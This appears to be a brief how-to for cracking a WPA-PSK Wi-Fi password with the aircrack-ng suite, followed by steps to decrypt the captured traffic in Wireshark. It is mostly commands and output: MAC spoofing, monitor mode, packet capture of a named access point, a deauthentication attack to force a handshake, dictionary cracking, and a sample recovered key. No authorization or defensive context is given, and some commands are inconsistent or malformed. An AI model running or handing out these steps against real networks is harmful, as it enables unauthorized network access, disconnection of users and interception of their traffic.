Cracking WPA-PSK

Prequisites

sudo apt install macchanger wireshark aircrack-ng -y

Steps

# Make sure default wifi turned off
sudo ifconfig wlan0 down &&
# Change mac address (optional) for clean operation
sudo macchanger -A atheros0 &&
# Turn on monitor mode
sudo airmon-ng start atheros0 &&
# List all active access point
sudo airodump-ng start wlan0mon && 
# Dump spesific access point
sudo airodump-ng -c 10 --bssid D0:D0:4B:0E:CD:28 -w /root/tap/log wlan0mon
# Replay packets
sudo aireplay-ng --deauth 10 -a D0:D0:4B:0E:CD:28 wlan0mon
# Crack WPA-PSK key
sudo aircrack-ng -b D0:D0:4B:0E:CD:28 /root/tap/log -w /root/tap/wordlist

Results:

Aircrack-ng 1.2 rc4

[00:00:00] 1/1 keys tested (229.15 k/s)

Time left: 0 seconds 100.00%

KEY FOUND! [ mySecretPassword ]


Master Key : 66 F4 7E 50 07 97 A3 00 19 23 47 6C 99 18 90 17
BE 51 91 35 51 71 44 4B 7C F5 CE 60 65 5C 8D B9

Transient Key : 0E 8C 7B FD F4 0B 79 FB AC 00 40 3E 9F 41 01 AF 
95 81 10 62 A0 BF 8A E1 42 DA 8B EA 7B 59 53 A6
28 7E 83 66 22 16 9B 58 AE 5B 5C C0 7D 43 F4 32
F5 2E 48 F2 01 D3 10 BE E7 F6 13 FA 4A 53 84 B2

EAPOL HMAC : 36 BD 83 91 02 F1 C1 45 3C B4 83 54 24 6D AD 45

Decrypt WLAN (IEE 802.11) packets

1. Open Wireshark.
2. If you have WPA-PSK key go to Edit -> Preference -> Capture set wlan0mon as default interface.
3. Enable decryption on Edit -> Preference -> Protocol -> IEE 802.11 and assign WPA-PSK key.
4. To get WPA-PSK key, you can generate using this tool

5. Start capture using wlan0mon interface.

6. https://www.youtube.com/watch?v=UK4zzSVXqiI

7. https://geekviews.tech/aircrack-ng-tutorial/